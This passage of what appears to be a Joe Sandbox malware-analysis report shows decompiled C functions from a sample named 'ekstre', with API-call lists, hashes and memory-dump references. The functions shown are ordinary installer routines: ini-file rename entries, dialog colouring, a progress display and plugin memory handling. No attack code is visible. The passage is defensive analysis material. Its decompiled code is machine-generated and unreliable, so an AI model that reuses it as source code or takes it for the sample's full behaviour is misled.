				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7bd2f8 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x7bd6f8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7bcef8, "%s=%s\r\n", 0x7bd2f8, 0x7bd6f8);
						_t53 = _t52 + 0x10;
						E004062C7(_t37, 0x400, 0x7bd6f8, 0x7bd6f8,  *((intOrPtr*)( *0x7c5f70 + 0x128)));
						_t12 = E00405DC7(0x7bd6f8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E3F(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D2C(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D2C(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D82(_t24 + _t46, 0x7bcef8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E6E(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DC7(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x7bd2f8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405e9d
0x00405ea6
0x00405ead
0x00405ec1
0x00405ee9
0x00405ef4
0x00405ef8
0x00405f18
0x00405f1f
0x00405f29
0x00405f36
0x00405f3b
0x00405f40
0x00405f44
0x00405f53
0x00405f55
0x00405f62
0x00405f66
0x00406001
0x00000000
0x00405f7c
0x00405f89
0x00405fad
0x00405fb1
0x00405fd0
0x00405fd4
0x00405fd4
0x00405fd6
0x00405fdf
0x00405fea
0x00405ff5
0x00405ffb
0x00000000
0x00405ffb
0x00405fb3
0x00405fb6
0x00405fc1
0x00405fbd
0x00405fbf
0x00405fc0
0x00405fc0
0x00405fc8
0x00405fca
0x00000000
0x00405fca
0x00405f94
0x00405f9a
0x00000000
0x00405f9a
0x00405f66
0x00405f44
0x00405ec3
0x00405ece
0x00405ed7
0x00405edb
0x00000000
0x00000000
0x00405edb
0x0040600c

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040602E,?,?), ref: 00405ECE
GetShortPathNameA.KERNEL32(?,007BD2F8,00000400), ref: 00405ED7

Part of subcall function 00405D2C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F87,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D3C
Part of subcall function 00405D2C: lstrlenA.KERNEL32(00000000,?,00000000,00405F87,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D6E

GetShortPathNameA.KERNEL32(?,007BD6F8,00000400), ref: 00405EF4
wsprintfA.USER32 ref: 00405F12
GetFileSize.KERNEL32(00000000,00000000,007BD6F8,C0000000,00000004,007BD6F8,?,?,?,?,?), ref: 00405F4D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F5C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F94
SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,007BCEF8,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEA
GlobalFree.KERNEL32(00000000), ref: 00405FFB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406002

Part of subcall function 00405DC7: GetFileAttributesA.KERNELBASE(00000003,00402F4C,007FD000,80000000,00000003,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00405DCB
Part of subcall function 00405DC7: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00405DED

Strings

[Rename], xrefs: 00405F7C, 00405F8E
%s=%s, xrefs: 00405F08

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 407d3f39375f04666bf0075d05f05ff1aab4f6bcb9be43fe1d438fc296dc3887
Instruction ID: 3c3f16b6a95818e59085580230d08641eb27af804ba5071be98a2a90f5394367
Opcode Fuzzy Hash: 407d3f39375f04666bf0075d05f05ff1aab4f6bcb9be43fe1d438fc296dc3887
Instruction Fuzzy Hash: 0C314671240B06BBD2206B659D48F6B3A5CEF45758F14003EF942F62D2EA7CE8118ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00404318 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404318(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040432a
0x004043e0
0x00000000
0x004043e0
0x0040433b
0x0040433f
0x00000000
0x00404359
0x00404359
0x00404362
0x00000000
0x00000000
0x00404364
0x00404370
0x00404373
0x00404373
0x00404379
0x0040437f
0x0040437f
0x0040438b
0x00404391
0x00404398
0x0040439b
0x0040439e
0x004043a0
0x004043a0
0x004043a8
0x004043ae
0x004043ae
0x004043b8
0x004043bd
0x004043c0
0x004043c5
0x004043c8
0x004043c8
0x004043d8
0x004043d8
0x00000000
0x004043db

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404335
GetSysColor.USER32(00000000), ref: 00404373
SetTextColor.GDI32(?,00000000), ref: 0040437F
SetBkMode.GDI32(?,?), ref: 0040438B
GetSysColor.USER32(?), ref: 0040439E
SetBkColor.GDI32(?,?), ref: 004043AE
DeleteObject.GDI32(?), ref: 004043C8
CreateBrushIndirect.GDI32(?), ref: 004043D2

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
Instruction ID: c1cf03454db873b669fe455fbfc5093d6825193a47bfd1230063ce26bbb8ff3d
Opcode Fuzzy Hash: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
Instruction Fuzzy Hash: 0F217771601704AFC734DF39D948B5BBBF8AF41714B04892EED92A22E0D774E904CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6DE82128 Relevance: 10.6, APIs: 7, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6DE82128(intOrPtr* _a4) {
				short _v84;
				intOrPtr* _t24;
				signed int _t25;
				intOrPtr _t26;
				intOrPtr _t33;
				void* _t39;
				void* _t42;

				_t39 = E6DE812C6();
				_t24 = _a4;
				_t33 =  *((intOrPtr*)(_t24 + 0x814));
				_t42 = (_t33 + 0x41 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
					}
					_t25 =  *(_t42 - 8) & 0x000000ff;
					if(_t25 <= 7) {
						switch( *((intOrPtr*)(_t25 * 4 +  &M6DE82268))) {
							case 0:
								 *_t39 = 0;
								goto L17;
							case 1:
								__edx =  *__edx;
								if(__ecx > 0) {
									__ecx = __ecx - 1;
									__ecx = __ecx *  *(0x6de84060 + __eax * 4);
									asm("sbb eax, eax");
									__edx = __edx &  *(0x6de84080 + __eax * 4);
								}
								_push(__edx);
								goto L15;
							case 2:
								_push(__edi);
								_push(__edx[1]);
								_push( *__edx);
								__eax = E6DE8144D(__ecx);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__edx,  *0x6de85040);
								goto L17;
							case 4:
								__ecx =  *0x6de85040;
								__ecx - 1 = WideCharToMultiByte(0, 0,  *__edx, __ecx, __edi, __ecx - 1, 0, 0);
								__eax =  *0x6de85040;
								 *((char*)(__eax + __edi - 1)) = 0;
								goto L17;
							case 5:
								_push(0x27);
								__eax =  &_v84;
								_push( &_v84);
								_push( *__edx);
								__imp__StringFromGUID2();
								__ecx = 0;
								__eax =  &_v84;
								__eax = WideCharToMultiByte(0, 0,  &_v84,  &_v84, __edi,  *0x6de85040, 0, 0);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x6de84058);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
						GlobalFree( *(_t42 + 0x14));
					}
					_t26 =  *((intOrPtr*)(_t42 + 0xc));
					if(_t26 != 0) {
						if(_t26 != 0xffffffff) {
							if(_t26 > 0) {
								E6DE815C7(_t26 - 1, _t39);
								goto L26;
							}
						} else {
							E6DE8157E(_t39);
							L26:
						}
					}
					_t42 = _t42 - 0x20;
					_t33 = _t33 - 1;
				} while (_t33 >= 0);
				return GlobalFree(_t39);
			}

0x6de82136
0x6de82138
0x6de8213b
0x6de82147
0x6de82149
0x6de8214e
0x6de8214e
0x6de82156
0x6de8215d
0x6de82163
0x00000000
0x6de8216a
0x00000000
0x00000000
0x6de82172
0x6de82176
0x6de82178
0x6de82179
0x6de82184
0x6de82188
0x6de82188
0x6de8218f
0x00000000
0x00000000
0x6de82192
0x6de82193
0x6de82196
0x6de82198
0x00000000
0x00000000
0x6de821a8
0x00000000
0x00000000
0x6de821d8
0x6de821ee
0x6de821f4
0x6de821f9
0x00000000
0x00000000
0x6de821b0
0x6de821b2
0x6de821b5
0x6de821b6
0x6de821b8
0x6de821be
0x6de821ca
0x6de821d0
0x00000000
0x00000000
0x6de82200
0x6de82202
0x6de82208
0x6de8220e
0x6de8220e
0x00000000
0x00000000
0x6de82163
0x6de82211
0x6de82215
0x6de82228
0x6de82228
0x6de8222e
0x6de82233
0x6de82238
0x6de82244
0x6de82249
0x00000000
0x6de8224e
0x6de8223a
0x6de8223b
0x6de8224f
0x6de8224f
0x6de82238
0x6de82250
0x6de82253
0x6de82253
0x6de82267

APIs

Part of subcall function 6DE812C6: GlobalAlloc.KERNELBASE(00000040,6DE811C4,-000000A0), ref: 6DE812CE

GlobalFree.KERNEL32(00000000), ref: 6DE82228
GlobalFree.KERNEL32(00000000), ref: 6DE8225D

Memory Dump Source

Source File: 00000000.00000002.1181790668.000000006DE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6DE80000, based on PE: true

Associated: 00000000.00000002.1181679975.000000006DE80000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181869899.000000006DE84000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181977025.000000006DE86000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de80000_ekstre.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a13316c73a590e77eba11d6a3eaa6d02393397eea371d27f65ff6bbc519792fd
Instruction ID: 923ddcf94ba73d8476d420a722f723dc80ab66a8fc5a29628dc6609a1953752b
Opcode Fuzzy Hash: a13316c73a590e77eba11d6a3eaa6d02393397eea371d27f65ff6bbc519792fd
Instruction Fuzzy Hash: 4C41E531108141EFDB268F94CE45F3BB7F9FB5B305F604119E909A6191EF31A841DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00402E25 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E25(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x79ad18; // 0x4e83a
					_t11 =  *0x7a6d24; // 0x4e83e
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402e32
0x00402e40
0x00402e46
0x00402e46
0x00402e54
0x00402e56
0x00402e5c
0x00402e63
0x00402e65
0x00402e65
0x00402e7b
0x00402e8b
0x00402e9d
0x00402e9d
0x00402ea5

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E40
MulDiv.KERNEL32(0004E83A,00000064,0004E83E), ref: 00402E6B
wsprintfA.USER32 ref: 00402E7B
SetWindowTextA.USER32(?,?), ref: 00402E8B
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E9D

Strings

verifying installer: %d%%, xrefs: 00402E75

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 4f4a4cd6def6ecdee58c4d477b8e0a51eb3349eb3cf07d6a946c4631745aadd2
Instruction ID: 50d4b92baf77fe00a7f3d2a7bcb5f53935e896cd5d52c500868d99ad50879bb8
Opcode Fuzzy Hash: 4f4a4cd6def6ecdee58c4d477b8e0a51eb3349eb3cf07d6a946c4631745aadd2
Instruction Fuzzy Hash: 5201627164020DFBEF109F60DE09EAE3BA9EB44344F008039FA06B51D0DBB89A51CF99

Uniqueness

Uniqueness Score: -1.00%

Function 6DE810C6 Relevance: 8.9, APIs: 7, Instructions: 155
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE810C6(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				signed int _v0;
				void _t29;
				void* _t30;
				void* _t36;
				void* _t43;
				intOrPtr _t52;
				void* _t56;
				void* _t62;
				void* _t63;
				void _t66;
				void* _t67;
				void* _t74;
				signed int _t75;
				void* _t79;
				void* _t80;
				void* _t82;
				signed int _t83;
				void* _t85;
				void _t88;
				void _t89;
				void* _t90;
				void* _t92;
				void* _t94;

				 *0x6de85040 = _a8;
				 *0x6de8503c = _a16;
				 *0x6de85038 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6de85014, E6DE812F7, _t79, _t82);
				_t83 =  *0x6de85040 * 0x14;
				_v0 = _t83;
				_t90 = E6DE8152B();
				_a8 = _t90;
				_t80 = _t90;
				_t66 = _v0;
				if(_t66 == 0) {
					L28:
					return GlobalFree(_t90);
				}
				do {
					_t29 = _t66;
					_t80 = _t80 + 1;
					_t94 = _t29 - 0x66;
					if(_t94 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L24:
							_t31 =  *0x6de85010;
							if( *0x6de85010 != 0) {
								E6DE812FA( *0x6de85038, _t31 + 4, _t83);
								_t67 =  *0x6de85010;
								_t92 = _t92 + 0xc;
								 *0x6de85010 =  *_t67;
								GlobalFree(_t67);
							}
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L15:
							GlobalFree(E6DE8157E(E6DE814E2( *_t80 - 0x30)));
							_t80 = _t80 + 1;
							goto L26;
						}
						_t43 = _t36;
						if(_t43 == 0) {
							L13:
							GlobalFree(E6DE815C7( *_t80 - 0x30, E6DE8152B()));
							_t80 = _t80 + 1;
							L11:
							_t83 = _v0;
							goto L26;
						}
						L8:
						if(_t43 != 1) {
							goto L26;
						}
						_t88 = GlobalAlloc(0x40, _t83 + 4);
						_t11 = _t88 + 4; // 0x4
						E6DE812FA(_t11,  *0x6de85038, _v0);
						 *_t88 =  *0x6de85010;
						 *0x6de85010 = _t88;
						L10:
						_t92 = _t92 + 0xc;
						goto L11;
					}
					if(_t94 == 0) {
						_t74 =  *0x6de8503c;
						_t85 =  *_t74;
						 *_t74 =  *_t85;
						_t75 = _v0;
						_t52 =  *((intOrPtr*)(_t75 + 0xc));
						_a12 = _t52;
						if( *((char*)(_t85 + 4)) == 0x1e) {
							E6DE812FA(_t75, _t85 + 6, 0x38);
							_t75 = _v0;
							_t92 = _t92 + 0xc;
							_t52 = _a12;
						}
						 *((intOrPtr*)(_t75 + 0xc)) = _t52;
						GlobalFree(_t85);
						goto L11;
					}
					_t56 = _t29 - 0x46;
					if(_t56 == 0) {
						_t89 = GlobalAlloc(0x40,  *0x6de85040 + 8);
						 *((intOrPtr*)(_t89 + 4)) = 0x1e;
						_t14 = _t89 + 6; // 0x6
						E6DE812FA(_t14, _v0, 0x38);
						 *_t89 =  *( *0x6de8503c);
						 *( *0x6de8503c) = _t89;
						goto L10;
					}
					_t62 = _t56 - 6;
					if(_t62 == 0) {
						goto L24;
					}
					_t63 = _t62 - 4;
					if(_t63 == 0) {
						 *_t80 =  *_t80 + 0xa;
						goto L15;
					}
					_t43 = _t63;
					if(_t43 == 0) {
						 *_t80 =  *_t80 + 0xa;
						goto L13;
					}
					goto L8;
					L26:
					_t66 =  *_t80;
				} while (_t66 != 0);
				_t90 = _a8;
				goto L28;
			}

0x6de810cc
0x6de810d6
0x6de810e0
0x6de810f4
0x6de810f7
0x6de810fe
0x6de8110d
0x6de8110f
0x6de81113
0x6de81115
0x6de8111a
0x6de812a7
0x6de812ae
0x6de812ae
0x6de81124
0x6de81124
0x6de81127
0x6de81128
0x6de8112b
0x6de81250
0x6de81253
0x6de8126d
0x6de8126d
0x6de81274
0x6de81281
0x6de81286
0x6de8128c
0x6de81292
0x6de81297
0x6de81297
0x00000000
0x6de81274
0x6de81255
0x6de81258
0x6de811b8
0x6de811cd
0x6de811cf
0x00000000
0x6de811cf
0x6de8125f
0x6de81262
0x6de8119b
0x6de811b0
0x6de811b2
0x6de8118f
0x6de8118f
0x00000000
0x6de8118f
0x6de81154
0x6de81157
0x00000000
0x00000000
0x6de8116d
0x6de81175
0x6de81179
0x6de81184
0x6de81186
0x6de8118c
0x6de8118c
0x00000000
0x6de8118c
0x6de81131
0x6de81213
0x6de81219
0x6de8121d
0x6de81223
0x6de81226
0x6de81229
0x6de8122d
0x6de81236
0x6de8123b
0x6de8123e
0x6de81241
0x6de81241
0x6de81246
0x6de81249
0x00000000
0x6de81249
0x6de81137
0x6de8113a
0x6de811e6
0x6de811ea
0x6de811f1
0x6de811f8
0x6de81205
0x6de8120c
0x00000000
0x6de8120c
0x6de81140
0x6de81143
0x00000000
0x00000000
0x6de81149
0x6de8114c
0x6de811b5
0x00000000
0x6de811b5
0x6de8114f
0x6de81152
0x6de81198
0x00000000
0x6de81198
0x00000000
0x6de81299
0x6de81299
0x6de8129b
0x6de812a3
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6DE81163
GlobalFree.KERNEL32(00000000), ref: 6DE811B0
GlobalFree.KERNEL32(00000000), ref: 6DE811CD
GlobalAlloc.KERNEL32(00000040,?), ref: 6DE811E0
GlobalFree.KERNEL32 ref: 6DE81249
GlobalFree.KERNEL32(?), ref: 6DE81297
GlobalFree.KERNEL32(00000000), ref: 6DE812A8

Memory Dump Source

Source File: 00000000.00000002.1181790668.000000006DE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6DE80000, based on PE: true

Associated: 00000000.00000002.1181679975.000000006DE80000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181869899.000000006DE84000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181977025.000000006DE86000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de80000_ekstre.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 391d1e0abaac1a669f1d0c53538a4191c6c620226709d13b0cd9e16bb80f907d
Instruction ID: fef7c0ec1c5c330af8a6b2374f230a45051560d79179d5ec5d7a44be8c26441e
Opcode Fuzzy Hash: 391d1e0abaac1a669f1d0c53538a4191c6c620226709d13b0cd9e16bb80f907d
Instruction Fuzzy Hash: 0C518FB15082819FD701CFE8C850A76BBF8FB4B309B20455DE5AADB252DF31E901DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00406512 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406512(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C33(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405BF1("*?|<>/\":", _t5))) == 0) {
							E00405D82(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406514
0x0040651c
0x00406530
0x00406530
0x00406536
0x00406543
0x00406543
0x00406544
0x00406546
0x0040654a
0x0040654c
0x00406555
0x00406557
0x00406571
0x00406579
0x00406579
0x0040657e
0x00406580
0x00406582
0x00406586
0x00406587
0x0040658a
0x00406592
0x00406594
0x00406598
0x00000000
0x00000000
0x0040659e
0x004065a3
0x00000000
0x00000000
0x00000000
0x004065a3
0x004065a8

APIs

CharNextA.USER32(0000000B,*?|<>/":,00000000,?,76E73410,007F9000,007EF000,0040336B,007F9000,007F9000,0040366D,?,00000007,00000009,0000000B), ref: 0040656A
CharNextA.USER32(0000000B,0000000B,0000000B,00000000,?,76E73410,007F9000,007EF000,0040336B,007F9000,007F9000,0040366D,?,00000007,00000009,0000000B), ref: 00406577
